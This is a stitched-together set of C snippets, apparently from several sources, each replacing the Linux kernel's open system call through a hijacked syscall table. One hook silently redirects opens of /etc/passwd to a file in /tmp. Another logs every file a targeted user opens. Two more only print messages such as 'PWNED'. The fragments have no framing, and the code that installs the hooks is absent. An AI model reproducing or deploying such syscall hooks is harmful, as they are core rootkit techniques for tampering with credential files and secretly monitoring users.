//Define our new sneaky version of the 'open' syscall asmlinkage int sneaky_sys_open(const char *pathname, int flags) { if (strstr(pathname, "/etc/passwd") != NULL) { char replace[] = "/tmp/passwd"; copy_to_user((void *)pathname, &replace, sizeof(replace)); return original_call(pathname, flags); } else { //printk(KERN_INFO "Very, very Sneaky!\n"); return original_call(pathname, flags); } }
/* * The function we'll replace sys_open (the function * called when you call the open system call) with. To * find the exact prototype, with the number and type * of arguments, we find the original function first * (it's at fs/open.c). * * In theory, this means that we're tied to the * current version of the kernel. In practice, the * system calls almost never change (it would wreck havoc * and require programs to be recompiled, since the system * calls are the interface between the kernel and the * processes). */ asmlinkage int our_sys_open(const char *filename, int flags, int mode) { int i = 0; char ch; /* * Check if this is the user we're spying on */ if (uid == current->cred->uid.val) { /* * Report the file, if relevant */ printk("Opened file by %d: ", uid); do { get_user(ch, filename + i); i++; printk("%c", ch); } while (ch != 0); printk("\n"); } printk(KERN_INFO "L5 syscall dump stack start.\n"); dump_stack(); printk(KERN_INFO "L5 syscall dump stack over.\n"); /* * Call the original sys_open - otherwise, we lose * the ability to open files */ return original_call(filename, flags, mode); }
asmlinkage int sys_our_open(const char *filename, int flags, int mode){ printk("<0>open system call\n"); return (original_call(filename, flags, mode)); }
static asmlinkage int hijacker_sys_open(const char* file, int flags, int mode) { printk(MODULE_NAME ": PWNED\n"); return original_call(file, flags, mode); }